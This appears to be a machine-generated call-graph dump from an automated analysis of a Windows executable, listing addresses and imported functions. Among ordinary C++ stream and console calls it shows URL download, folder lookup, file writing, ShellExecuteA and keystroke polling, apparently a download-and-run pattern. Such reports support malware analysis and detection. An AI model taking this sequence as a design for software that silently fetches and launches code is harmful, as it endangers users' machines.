7ff6ace850f9 2015->2016 2016->2008 2017 7ff6ace85138 _invalid_parameter_noinfo_noreturn 2016->2017 2017->2010 2019 7ff6ace82119 _stricmp 2018->2019 2020 7ff6ace82116 2018->2020 2021 7ff6ace82201 2019->2021 2022 7ff6ace8212f memset 2019->2022 2020->2019 2024 7ff6ace85ad0 8 API calls 2021->2024 2023 7ff6ace8214b 2022->2023 2210 7ff6ace847f0 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH 2023->2210 2026 7ff6ace82221 2024->2026 2026->1950 2026->1957 2028 7ff6ace8218d ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J 2030 7ff6ace84730 12 API calls 2028->2030 2029 7ff6ace82205 2031 7ff6ace82230 15 API calls 2029->2031 2032 7ff6ace821a8 2030->2032 2031->2021 2033 7ff6ace821ad ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 2032->2033 2034 7ff6ace821cc ShellExecuteA 2032->2034 2033->2034 2219 7ff6ace82230 2034->2219 2040 7ff6ace84c60 ?good@ios_base@std@ 2037->2040 2039 7ff6ace84cb3 2043 7ff6ace84cc9 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 2039->2043 2044 7ff6ace84ce1 2039->2044 2040->2039 2040->2044 2042 7ff6ace84d3d ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 2045 7ff6ace84ceb ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 2042->2045 2050 7ff6ace84d5a 2042->2050 2043->2044 2044->2042 2044->2045 2048 7ff6ace84d15 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 2044->2048 2046 7ff6ace84dcd ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 2045->2046 2047 7ff6ace84dd7 2045->2047 2046->2047 2047->1957 2048->2044 2048->2045 2049 7ff6ace84d65 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 2049->2045 2049->2050 2050->2045 2050->2049 2052 7ff6ace85af8 std::_Facet_Register 3 API calls 2051->2052 2053 7ff6ace815a7 2052->2053 2054 7ff6ace85af8 std::_Facet_Register 3 API calls 2053->2054 2055 7ff6ace81604 2054->2055 2056 7ff6ace85af8 std::_Facet_Register 3 API calls 2055->2056 2057 7ff6ace81660 2056->2057 2058 7ff6ace85af8 std::_Facet_Register 3 API calls 2057->2058 2059 7ff6ace816bc 2058->2059 2060 7ff6ace85af8 std::_Facet_Register 3 API calls 2059->2060 2061 7ff6ace81718 2060->2061 2062 7ff6ace85af8 std::_Facet_Register 3 API calls 2061->2062 2063 7ff6ace8177a 2062->2063 2244 7ff6ace858a0 2063->2244 2065 7ff6ace817a8 2066 7ff6ace817c8 GetStdHandle GetConsoleScreenBufferInfo 2065->2066 2079 7ff6ace817e9 2066->2079 2067 7ff6ace818c4 2068 7ff6ace84c30 9 API calls 2067->2068 2069 7ff6ace818d7 2068->2069 2071 7ff6ace85af8 std::_Facet_Register 3 API calls 2069->2071 2073 7ff6ace818fc 2071->2073 2072 7ff6ace856e0 9 API calls 2074 7ff6ace818a7 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2072->2074 2075 7ff6ace85af8 std::_Facet_Register 3 API calls 2073->2075 2074->2067 2074->2079 2077 7ff6ace8198c 2075->2077 2078 7ff6ace858a0 18 API calls 2077->2078 2080 7ff6ace819b7 2078->2080 2079->2067 2079->2072 2081 7ff6ace81a9a _invalid_parameter_noinfo_noreturn 2079->2081 2082 7ff6ace85af0 free 2079->2082 2260 7ff6ace842f0 2079->2260 2277 7ff6ace856e0 2079->2277 2083 7ff6ace819d7 GetStdHandle GetConsoleScreenBufferInfo 2080->2083 2089 7ff6ace81a0a 2081->2089 2082->2079 2084 7ff6ace81b16 SetConsoleTextAttribute 2083->2084 2083->2089 2085 7ff6ace84c30 9 API calls 2084->2085 2088 7ff6ace81b3e SetConsoleTextAttribute ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH SetConsoleTextAttribute ?fail@ios_base@std@ 2085->2088 2086 7ff6ace81af5 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2086->2084 2086->2089 2087 7ff6ace842f0 7 API calls 2087->2089 2090 7ff6ace81b8a 2088->2090 2091 7ff6ace81fb3 2088->2091 2089->2086 2089->2087 2092 7ff6ace81ad7 SetConsoleTextAttribute 2089->2092 2098 7ff6ace856e0 9 API calls 2089->2098 2107 7ff6ace81da1 _invalid_parameter_noinfo_noreturn 2089->2107 2108 7ff6ace85af0 free 2089->2108 2094 7ff6ace81faa exit 2090->2094 2095 7ff6ace81b95 2090->2095 2093 7ff6ace84c30 9 API calls 2091->2093 2291 7ff6ace84a60 2092->2291 2096 7ff6ace81fc6 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z Sleep 2093->2096 2094->2091 2095->2091 2099 7ff6ace81b9e 2095->2099 2150 7ff6ace81fa8 2096->2150 2098->2089 2100 7ff6ace84c30 9 API calls 2099->2100 2102 7ff6ace81bb1 SetConsoleTextAttribute 2100->2102 2101 7ff6ace81520 58 API calls 2106 7ff6ace81fe6 2101->2106 2103 7ff6ace84c30 9 API calls 2102->2103 2104 7ff6ace81bd2 SetConsoleTextAttribute 2103->2104 2110 7ff6ace84c30 9 API calls 2104->2110 2105 7ff6ace82035 2109 7ff6ace82093 2105->2109 2112 7ff6ace852c0 8 API calls 2105->2112 2106->2105 2318 7ff6ace852c0 2106->2318 2125 7ff6ace81d44 2107->2125 2108->2089 2114 7ff6ace85ad0 8 API calls 2109->2114 2113 7ff6ace81bf3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z Sleep SetConsoleTextAttribute 2110->2113 2116 7ff6ace82057 2112->2116 2117 7ff6ace84c30 9 API calls 2113->2117 2118 7ff6ace820a2 2114->2118 2115 7ff6ace81ff9 2119 7ff6ace82030 2115->2119 2123 7ff6ace82029 _invalid_parameter_noinfo_noreturn 2115->2123 2120 7ff6ace8208e 2116->2120 2127 7ff6ace82087 _invalid_parameter_noinfo_noreturn 2116->2127 2122 7ff6ace81c2f SetConsoleTextAttribute 2117->2122 2118->1897 2126 7ff6ace85af0 free 2119->2126 2130 7ff6ace85af0 free 2120->2130 2121 7ff6ace81dfa memcpy 2128 7ff6ace856e0 9 API calls 2121->2128 2129 7ff6ace84c30 9 API calls 2122->2129 2123->2119 2124 7ff6ace820c8 2132 7ff6ace81110 Concurrency::cancel_current_task __std_exception_copy 2124->2132 2125->2121 2125->2124 2131 7ff6ace85af8 __std_exception_copy malloc _CxxThrowException std::_Facet_Register 2125->2131 2138 7ff6ace81f60 _invalid_parameter_noinfo_noreturn 2125->2138 2139 7ff6ace81e8a 2125->2139 2126->2105 2127->2120 2134 7ff6ace81e43 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2128->2134 2135 7ff6ace81c50 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z SetConsoleTextAttribute 2129->2135 2130->2109 2131->2125 2133 7ff6ace820ce 2132->2133 2134->2125 2136 7ff6ace81e8f GetAsyncKeyState 2134->2136 2137 7ff6ace84c30 9 API calls 2135->2137 2141 7ff6ace81f67 2136->2141 2151 7ff6ace81ea5 2136->2151 2140 7ff6ace81c81 SetConsoleTextAttribute 2137->2140 2138->2141 2142 7ff6ace85af0 free 2139->2142 2143 7ff6ace84c30 9 API calls 2140->2143 2146 7ff6ace81fa3 2141->2146 2148 7ff6ace81f9c _invalid_parameter_noinfo_noreturn 2141->2148 2141->2150 2142->2136 2145 7ff6ace81ca2 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2143->2145 2144 7ff6ace84e10 7 API calls 2144->2151 2147 7ff6ace84c30 9 API calls 2145->2147 2149 7ff6ace85af0 free 2146->2149 2153 7ff6ace81cc5 Sleep _time64 srand 2147->2153 2148->2146 2149->2150 2150->2101 2151->2144 2151->2148 2152 7ff6ace81370 19 API calls 2151->2152 2154 7ff6ace85af0 free 2151->2154 2155 7ff6ace81f00 SetConsoleTextAttribute 2152->2155 2306 7ff6ace81370 2153->2306 2154->2151 2157 7ff6ace84c30 9 API calls 2155->2157 2160 7ff6ace81f22 SetConsoleTextAttribute 2157->2160 2159 7ff6ace84c30 9 API calls 2161 7ff6ace81d0b SetConsoleTextAttribute 2159->2161 2162 7ff6ace81d3e 2160->2162 2163 7ff6ace820c3 2160->2163 2161->2162 2161->2163 2162->2125 2348 7ff6ace811b0 ?_Xlength_error@std@@YAXPEBD 2163->2348 2169 7ff6ace84747 2168->2169 2170 7ff6ace847a5 2168->2170 2174 7ff6ace84640 2169->2174 2171 7ff6ace847a7 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 2170->2171 2171->1991 2173 7ff6ace84781 fclose 2173->2171 2175 7ff6ace84713 2174->2175 2176 7ff6ace84663 2174->2176 2177 7ff6ace85ad0 8 API calls 2175->2177 2176->2175 2178 7ff6ace8466d 2176->2178 2179 7ff6ace84722 2177->2179 2180 7ff6ace84686 ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD 2178->2180 2182 7ff6ace846b1 2178->2182 2179->2173 2181 7ff6ace846ac 2180->2181 2181->2182 2185 7ff6ace846e7 fwrite 2181->2185 2186 7ff6ace85ad0 2182->2186 2185->2182 2187 7ff6ace85ad9 2186->2187 2188 7ff6ace846ce 2187->2188 2189 7ff6ace86124 IsProcessorFeaturePresent 2187->2189 2188->2173 2190 7ff6ace8613c 2189->2190 2195 7ff6ace861f8 RtlCaptureContext 2190->2195 2196 7ff6ace86212 RtlLookupFunctionEntry 2195->2196 2197 7ff6ace86228 RtlVirtualUnwind 2196->2197 2198 7ff6ace8614f 2196->2198 2197->2196 2197->2198 2199 7ff6ace860f0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2198->2199 2201 7ff6ace85643 2200->2201 2208 7ff6ace811b0 ?_Xlength_error@std@@YAXPEBD 2201->2208 2211 7ff6ace848d5 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ _get_stream_buffer_pointers ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2 2210->2211 2212 7ff6ace849ae ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 2210->2212 2223 7ff6ace851b0 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 2211->2223 2218 7ff6ace84971 2212->2218 2214 7ff6ace85ad0 8 API calls 2216 7ff6ace82158 2214->2216 2216->2028 2216->2029 2217 7ff6ace84977 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 2217->2218 2218->2214 2220 7ff6ace82286 2219->2220 2221 7ff6ace822c3 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 2220->2221 2222 7ff6ace84730 12 API calls 2220->2222 2222->2221 2224 7ff6ace85212 2223->2224 2225 7ff6ace85287 ??1_Lockit@std@@QEAA 2224->2225 2227 7ff6ace85229 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 2224->2227 2229 7ff6ace85235 2224->2229 2226 7ff6ace85ad0 8 API calls 2225->2226 2228 7ff6ace84961 ?always_noconv@codecvt_base@std@ 2226->2228 2227->2229 2228->2217 2228->2218 2229->2225 2230 7ff6ace8524c ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 2229->2230 2231 7ff6ace852b7 2230->2231 2232 7ff6ace85260 2230->2232 2240 7ff6ace81200 2231->2240 2237 7ff6ace85a70 2232->2237 2235 7ff6ace852bc 2238 7ff6ace85af8 std::_Facet_Register 3 API calls 2237->2238 2239 7ff6ace85272 2238->2239 2239->2225 2243 7ff6ace811d0 2240->2243 2242 7ff6ace8120e _CxxThrowException __std_exception_copy 2242->2235 2243->2242 2245 7ff6ace859fd 2244->2245 2253 7ff6ace858f4 2244->2253 2246 7ff6ace852c0 8 API calls 2245->2246 2247 7ff6ace85a08 2246->2247 2248 7ff6ace85ad0 8 API calls 2247->2248 2249 7ff6ace85a18 2248->2249 2249->2065 2252 7ff6ace859be memcpy 2252->2253 2253->2245 2253->2252 2254 7ff6ace85af8 std::_Facet_Register 3 API calls 2253->2254 2255 7ff6ace85a3d 2253->2255 2256 7ff6ace85af8 std::_Facet_Register 3 API calls 2253->2256 2258 7ff6ace85a36 _invalid_parameter_noinfo_noreturn 2253->2258 2259 7ff6ace85a42 2253->2259 2254->2253 2257 7ff6ace81110 Concurrency::cancel_current_task __std_exception_copy 2255->2257 2256->2252 2257->2259 2258->2255 2349 7ff6ace811b0 ?_Xlength_error@std@@YAXPEBD 2259->2349 2261 7ff6ace843f7 2260->2261 2262 7ff6ace84325 2260->2262 2350 7ff6ace811b0 ?_Xlength_error@std@@YAXPEBD 2261->2350 2263 7ff6ace8432b memset 2262->2263 2271 7ff6ace84358 2262->2271 2263->2079 2265 7ff6ace84364 2268 7ff6ace85af8 std::_Facet_Register 3 API calls 2265->2268 2266 7ff6ace843fc 2269 7ff6ace81110 Concurrency::cancel_current_task __std_exception_copy 2266->2269 2267 7ff6ace843c8 memset 2267->2079 2273 7ff6ace8437a 2268->2273 2274 7ff6ace84402 2269->2274 2270 7ff6ace843c0 2272 7ff6ace85af8 std::_Facet_Register 3 API calls 2270->2272 2271->2265 2271->2266 2271->2267 2271->2270 2276 7ff6ace8437f 2272->2276 2275 7ff6ace843b9 _invalid_parameter_noinfo_noreturn 2273->2275 2273->2276 2275->2270 2276->2267 2278 7ff6ace85716 ?good@ios_base@std@ 2277->2278 2280 7ff6ace8574f 2278->2280 2289 7ff6ace8577d 2278->2289 2281 7ff6ace85765 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 2280->2281 2280->2289 2281->2289 2283 7ff6ace857d7 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 2287 7ff6ace85787 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 2283->2287 2288 7ff6ace857c7 2283->2288 2284 7ff6ace8586b 2284->2079 2285 7ff6ace85861 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 2285->2284 2286 7ff6ace857ab ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 2286->2288 2286->2289 2287->2284 2287->2285 2288->2287 2290 7ff6ace857f9 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 2288->2290 2289->2283 2289->2286 2289->2287 2290->2287 2290->2288 2292 7ff6ace84a9c 2291->2292 2293 7ff6ace84aa3 ?good@ios_base@std@ 2291->2293 2292->2293 2294 7ff6ace84ab7 2293->2294 2300 7ff6ace84ae5 2293->2300 2296 7ff6ace84acd ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 2294->2296 2294->2300 2295 7ff6ace84bc2 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 2298 7ff6ace84bfc 2295->2298 2299 7ff6ace84bf2 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 2295->2299 2296->2300 2297 7ff6ace84b59 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 2301 7ff6ace84b77 2297->2301 2298->2089 2299->2298 2300->2295 2300->2297 2300->2301 2302 7ff6ace84b2c ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 2300->2302 2303 7ff6ace84b56 2300->2303 2304 7ff6ace84bb2 2301->2304 2305 7ff6ace84b8c ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 2301->2305 2302->2300 2303->2297 2304->2295 2305->2301 2307 7ff6ace85af8 std::_Facet_Register 3 API calls 2306->2307 2308 7ff6ace813b3 2307->2308 2309 7ff6ace85af8 std::_Facet_Register 3 API calls 2308->2309 2311 7ff6ace8142a 2309->2311 2310 7ff6ace81478 rand 2310->2311 2311->2310 2313 7ff6ace814dd 2311->2313 2351 7ff6ace85350 2311->2351 2314 7ff6ace85af0 free 2313->2314 2315 7ff6ace814ea 2314->2315 2316 7ff6ace85ad0 8 API calls 2315->2316 2317 7ff6ace814fa SetConsoleTextAttribute 2316->2317 2317->2159 2319 7ff6ace8532e 2318->2319 2320 7ff6ace852c5 2318->2320 2319->2115 2320->2319 2321 7ff6ace8533e _invalid_parameter_noinfo_noreturn 2320->2321 2322 7ff6ace85af0 free 2320->2322 2323 7ff6ace85350 2321->2323 2322->2320 2324 7ff6ace854a5 2323->2324 2327 7ff6ace8537f 2323->2327 2378 7ff6ace811b0 ?_Xlength_error@std@@YAXPEBD 2324->2378 2326 7ff6ace854aa 2331 7ff6ace81110 Concurrency::cancel_current_task __std_exception_copy 2326->2331 2329 7ff6ace853d7 2327->2329 2330 7ff6ace8540f 2327->2330 2332 7ff6ace853e4 2327->2332 2339 7ff6ace853ca 2327->2339 2328 7ff6ace85af8 std::_Facet_Register 3 API calls 2328->2339 2329->2326 2329->2332 2334 7ff6ace85af8 std::_Facet_Register 3 API calls 2330->2334 2335 7ff6ace854b0 2331->2335 2332->2328 2333 7ff6ace8546e _invalid_parameter_noinfo_noreturn 2341 7ff6ace8546c 2333->2341 2334->2339 2379 7ff6ace811b0 ?_Xlength_error@std@@YAXPEBD 2335->2379 2336 7ff6ace8542b memcpy 2337 7ff6ace8544c 2336->2337 2338 7ff6ace85461 2336->2338 2337->2333 2337->2338 2340 7ff6ace85af0 free 2338->2340 2339->2333 2339->2336 2339->2341 2340->2341 2341->2115 2352 7ff6ace854a5 2351->2352 2356 7ff6ace8537f 2351->2356 2376 7ff6ace811b0 ?_Xlength_error@std@@YAXPEBD 2352->2376 2353 7ff6ace853e4 2357 7ff6ace85af8 std::_Facet_Register 3 API calls 2353->2357 2355 7ff6ace854aa 2361 7ff6ace81110 Concurrency::cancel_current_task __std_exception_copy 2355->2361 2356->2353 2358 7ff6ace853d7 2356->2358 2359 7ff6ace8540f 2356->2359 2360 7ff6ace853ca 2356->2360 2357->2360 2358->2353 2358->2355 2363 7ff6ace85af8 std::_Facet_Register 3 API calls 2359->2363 2362 7ff6ace8546e _invalid_parameter_noinfo_noreturn 2360->2362 2365 7ff6ace8542b memcpy 2360->2365 2369 7ff6ace8546c 2360->2369 2364 7ff6ace854b0 2361->2364 2362->2369 2363->2360 2377 7ff6ace811b0 ?_Xlength_error@std@@YAXPEBD 2364->2377 2366 7ff6ace8544c 2365->2366 2367 7ff6ace85461 2365->2367 2366->2362 2366->2367 2368 7ff6ace85af0 free 2367->2368 2368->2369 2369->2311 2380 7ff6ace84a20 ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 2451 7ff6ace84120 2452 7ff6ace8412c _lock_file 2451->2452 2453 7ff6ace84133 2451->2453 2452->2453 2454 7ff6ace835a0 2455 7ff6ace835b3 2454->2455 2456 7ff6ace835e0 2454->2456 2455->2456 2457 7ff6ace835c3 fflush 2455->2457 2458 7ff6ace86ea0 ??1_Lockit@std@@QEAA 2463 7ff6ace85c0c 2464 7ff6ace85c24 2463->2464 2465 7ff6ace85c2e 2463->2465 2466 7ff6ace85af0 free 2464->2466 2466->2465 2467 7ff6ace82714 2468 7ff6ace8276c 2467->2468 2469 7ff6ace82775 InternetOpenUrlA 2468->2469 2470 7ff6ace827f8 2468->2470 2471 7ff6ace827b0 HttpQueryInfoA 2469->2471 2472 7ff6ace827ef InternetCloseHandle 2469->2472 2474 7ff6ace828c1 2470->2474 2475 7ff6ace828bc 2470->2475 2478 7ff6ace82844 _invalid_parameter_noinfo_noreturn 2470->2478 2480 7ff6ace82856 InternetReadFile InternetCloseHandle InternetCloseHandle 2470->2480 2471->2470 2473 7ff6ace827e6 InternetCloseHandle 2471->2473 2472->2470 2473->2472 2476 7ff6ace82926 2474->2476 2479 7ff6ace84c30 9 API calls 2474->2479 2477 7ff6ace85af0 free 2475->2477 2477->2474 2478->2470 2481 7ff6ace828f1 2479->2481 2480->2470 2482 7ff6ace85ad0 8 API calls 2481->2482 2483 7ff6ace82905 2482->2483 2484 7ff6ace81010 __std_exception_copy 2485 7ff6ace86f90 2487 7ff6ace86f98 2485->2487 2486 7ff6ace86fe5 2487->2486 2488 7ff6ace85af0 free 2487->2488 2488->2487 2489 7ff6ace86c90 2492 7ff6ace84290 2489->2492 2493 7ff6ace842a3 2492->2493 2494 7ff6ace842cf 2492->2494 2495 7ff6ace842e8 _invalid_parameter_noinfo_noreturn 2493->2495 2496 7ff6ace842c7 2493->2496 2497 7ff6ace85af0 free 2496->2497 2497->2494 2498 7ff6ace86e0e ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA 2502 7ff6ace86ef8 2503 7ff6ace86f2d __current_exception __current_exception_context terminate 2502->2503 2504 7ff6ace86f21 2502->2504 2503->2504 2505 7ff6ace826f6 2506 7ff6ace826fb 2505->2506 2507 7ff6ace82748 InternetOpenA 2505->2507 2506->2507 2508 7ff6ace8276c 2507->2508 2509 7ff6ace82775 InternetOpenUrlA 2508->2509 2516 7ff6ace827f8 2508->2516 2510 7ff6ace827b0 HttpQueryInfoA 2509->2510 2511 7ff6ace827ef InternetCloseHandle 2509->2511 2512 7ff6ace827e6 InternetCloseHandle 2510->2512 2510->2516 2511->2516 2512->2511 2513 7ff6ace828c1 2515 7ff6ace82926 2513->2515 2519 7ff6ace84c30 9 API calls 2513->2519 2514 7ff6ace828bc 2517 7ff6ace85af0 free 2514->2517 2516->2513 2516->2514 2518 7ff6ace82844 _invalid_parameter_noinfo_noreturn 2516->2518 2520 7ff6ace82856 InternetReadFile InternetCloseHandle InternetCloseHandle 2516->2520 2517->2513 2518->2516 2521 7ff6ace828f1 2519->2521 2520->2516 2522 7ff6ace85ad0 8 API calls 2521->2522 2523 7ff6ace82905 2522->2523 2527 7ff6ace86a84 2528 7ff6ace86abc __GSHandlerCheckCommon 2527->2528 2529 7ff6ace86ae8 2528->2529 2530 7ff6ace86ad7 __CxxFrameHandler4 2528->2530 2530->2529 2531 7ff6ace82702 2532 7ff6ace8275a InternetOpenA 2531->2532 2533 7ff6ace8276c 2532->2533 2534 7ff6ace82775 InternetOpenUrlA 2533->2534 2541 7ff6ace827f8 2533->2541 2535 7ff6ace827b0 HttpQueryInfoA 2534->2535 2536 7ff6ace827ef InternetCloseHandle 2534->2536 2537 7ff6ace827e6 InternetCloseHandle 2535->2537 2535->2541 2536->2541 2537->2536 2538 7ff6ace828c1 2540 7ff6ace82926 2538->2540 2544 7ff6ace84c30 9 API calls 2538->2544 2539 7ff6ace828bc 2542 7ff6ace85af0 free 2539->2542 2541->2538 2541->2539 2543 7ff6ace82844 _invalid_parameter_noinfo_noreturn 2541->2543 2545 7ff6ace82856 InternetReadFile InternetCloseHandle InternetCloseHandle 2541->2545 2542->2538 2543->2541 2546 7ff6ace828f1 2544->2546 2545->2541 2547 7ff6ace85ad0 8 API calls 2546->2547 2548 7ff6ace82905 2547->2548 2549 7ff6ace84600 ?uncaught_exception@std@ 2550 7ff6ace8461d 2549->2550 2551 7ff6ace84613 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 2549->2551 2551->2550 2552 7ff6ace84100 2553 7ff6ace8410c _unlock_file 2552->2553 2554 7ff6ace84113 2552->2554 2553->2554 2555 7ff6ace83b00 2556 7ff6ace83b37 2555->2556 2558 7ff6ace83bb2 fgetc 2556->2558 2559 7ff6ace83bce fgetc 2556->2559 2561 7ff6ace83b47 2556->2561 2557 7ff6ace85ad0 8 API calls 2560 7ff6ace83dbb 2557->2560 2558->2561 2564 7ff6ace83d05 2559->2564 2566 7ff6ace83bfb 2559->2566 2561->2557 2562 7ff6ace83c3a ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 2562->2566 2563 7ff6ace85350 10 API calls 2563->2562 2564->2561 2565 7ff6ace83da8 2564->2565 2568 7ff6ace83d40 _invalid_parameter_noinfo_noreturn 2564->2568 2567 7ff6ace85af0 free 2565->2567 2566->2562 2566->2563 2566->2564 2569 7ff6ace83cb2 memcpy fgetc 2566->2569 2570 7ff6ace83d5f 2566->2570 2567->2561 2568->2564 2569->2564 2569->2566 2570->2564 2571 7ff6ace83d80 ungetc 2570->2571 2571->2564 2571->2570 2572 7ff6ace85d00 2576 7ff6ace8657c SetUnhandledExceptionFilter 2572->2576 2577 7ff6ace835f0 2578 7ff6ace83613 2577->2578 2579 7ff6ace83631 setvbuf 2578->2579 2582 7ff6ace836af 2578->2582 2580 7ff6ace8363f ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 2579->2580 2579->2582 2581 7ff6ace83661 _get_stream_buffer_pointers 2580->2581 2580->2582 2581->2582 2583 7ff6ace85ad0 8 API calls 2582->2583 2584 7ff6ace836de 2583->2584 2585 7ff6ace836f0 2586 7ff6ace83726 2585->2586 2587 7ff6ace83745 2585->2587 2588 7ff6ace84640 10 API calls 2586->2588 2589 7ff6ace85ad0 8 API calls 2587->2589 2590 7ff6ace8372b 2588->2590 2591 7ff6ace837bb 2589->2591 2590->2587 2592 7ff6ace8372f fsetpos 2590->2592 2592->2587 2594 7ff6ace81070 __std_exception_destroy 2595 7ff6ace81098 2594->2595 2596 7ff6ace810a5 2594->2596 2597 7ff6ace85af0 free 2595->2597 2597->2596 2598 7ff6ace86b5c 2599 7ff6ace86b7c 2598->2599 2600 7ff6ace86b6f 2598->2600 2601 7ff6ace84290 2 API calls 2600->2601 2601->2599 2602 7ff6ace86e58 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 2603 7ff6ace86f57 _seh_filter_exe 2381 7ff6ace838e0 2382 7ff6ace838f9 ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J 2381->2382 2383 7ff6ace83908 2381->2383 2382->2383 2384 7ff6ace83989 2383->2384 2385 7ff6ace8393c memcpy 2383->2385 2386 7ff6ace83969 2383->2386 2385->2384 2385->2386 2386->2384 2387 7ff6ace83975 fwrite 2386->2387 2387->2384 2604 7ff6ace86de0 2605 7ff6ace86e08 2604->2605 2606 7ff6ace86df3 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 2604->2606 2606->2605 2607 7ff6ace82c60 2608 7ff6ace82cb8 InternetOpenA 2607->2608 2609 7ff6ace82cd3 InternetOpenUrlA 2608->2609 2616 7ff6ace82db1 2608->2616 2610 7ff6ace82d1c HttpQueryInfoA 2609->2610 2611 7ff6ace82d0e InternetCloseHandle 2609->2611 2613 7ff6ace82d66 2610->2613 2614 7ff6ace82d52 InternetCloseHandle InternetCloseHandle 2610->2614 2611->2616 2612 7ff6ace82e0f SHGetFolderPathA 2620 7ff6ace831be SHGetFolderPathA 2612->2620 2625 7ff6ace82e89 2612->2625 2621 7ff6ace82d71 InternetReadFile InternetCloseHandle InternetCloseHandle 2613->2621 2614->2616 2615 7ff6ace82e0a 2619 7ff6ace85af0 free 2615->2619 2616->2612 2616->2615 2618 7ff6ace82e03 _invalid_parameter_noinfo_noreturn 2616->2618 2618->2615 2619->2612 2622 7ff6ace83510 2620->2622 2626 7ff6ace831e5 2620->2626 2621->2616 2623 7ff6ace85af0 free 2622->2623 2624 7ff6ace83518 2623->2624 2627 7ff6ace81520 102 API calls 2624->2627 2629 7ff6ace82f28 memcpy 2625->2629 2645 7ff6ace82f5d 2625->2645 2673 7ff6ace8353c 2625->2673 2631 7ff6ace83288 memcpy 2626->2631 2632 7ff6ace8351d 2626->2632 2654 7ff6ace832bd 2626->2654 2627->2632 2630 7ff6ace82ff1 2629->2630 2635 7ff6ace84f80 9 API calls 2630->2635 2636 7ff6ace83362 2631->2636 2702 7ff6ace811b0 ?_Xlength_error@std@@YAXPEBD 2632->2702 2640 7ff6ace83008 2635->2640 2641 7ff6ace84f80 9 API calls 2636->2641 2638 7ff6ace82fc2 memcpy 2638->2630 2639 7ff6ace83530 2657 7ff6ace81110 Concurrency::cancel_current_task __std_exception_copy 2639->2657 2647 7ff6ace8304d 2640->2647 2658 7ff6ace83048 2640->2658 2666 7ff6ace83041 _invalid_parameter_noinfo_noreturn 2640->2666 2648 7ff6ace83379 2641->2648 2642 7ff6ace85af8 std::_Facet_Register 3 API calls 2649 7ff6ace82f78 2642->2649 2644 7ff6ace82fba 2656 7ff6ace85af8 